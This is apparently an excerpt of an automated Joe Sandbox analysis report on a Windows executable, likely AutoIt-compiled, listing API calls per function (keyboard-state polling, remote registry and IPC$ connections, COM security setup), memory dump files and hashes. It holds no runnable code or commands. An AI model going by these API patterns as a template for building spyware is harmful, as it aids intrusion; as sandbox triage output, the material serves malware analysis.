                                                                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                              • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                              Strings
                                                                                                                                              • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                              • API String ID: 440038798-2785691316
                                                                                                                                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                                              APIs
                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                              • _wcslen.LIBCMT ref: 004610A3
                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                                              • String ID: ThumbnailClass
                                                                                                                                              • API String ID: 4136854206-1241985126
                                                                                                                                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                              APIs
                                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                              • String ID: 2
                                                                                                                                              • API String ID: 1331449709-450215437
                                                                                                                                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                              • __swprintf.LIBCMT ref: 00460915
                                                                                                                                              • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                              • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                                                              • API String ID: 3054410614-2561132961
                                                                                                                                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                                                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                                                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                              • API String ID: 600699880-22481851
                                                                                                                                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyWindow
                                                                                                                                              • String ID: static
                                                                                                                                              • API String ID: 3375834691-2160076837
                                                                                                                                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                              • API String ID: 2907320926-3566645568
                                                                                                                                              • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                              • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                              • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                              • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                                              • DeleteObject.GDI32(003D0000), ref: 00470A04
                                                                                                                                              • DestroyIcon.USER32(003A0043), ref: 00470A1C
                                                                                                                                              • DeleteObject.GDI32(10DFFC93), ref: 00470A34
                                                                                                                                              • DestroyWindow.USER32(006C0061), ref: 00470A4C
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1237572874-0
                                                                                                                                              • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                              • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                              • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                              • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                              APIs
                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                              • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                              • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                              • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                              • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                              APIs
                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                              • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                              • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                              • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                              • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3413494760-0
                                                                                                                                              • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                              • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                              • String ID: AU3_FreeVar
                                                                                                                                              • API String ID: 2634073740-771828931
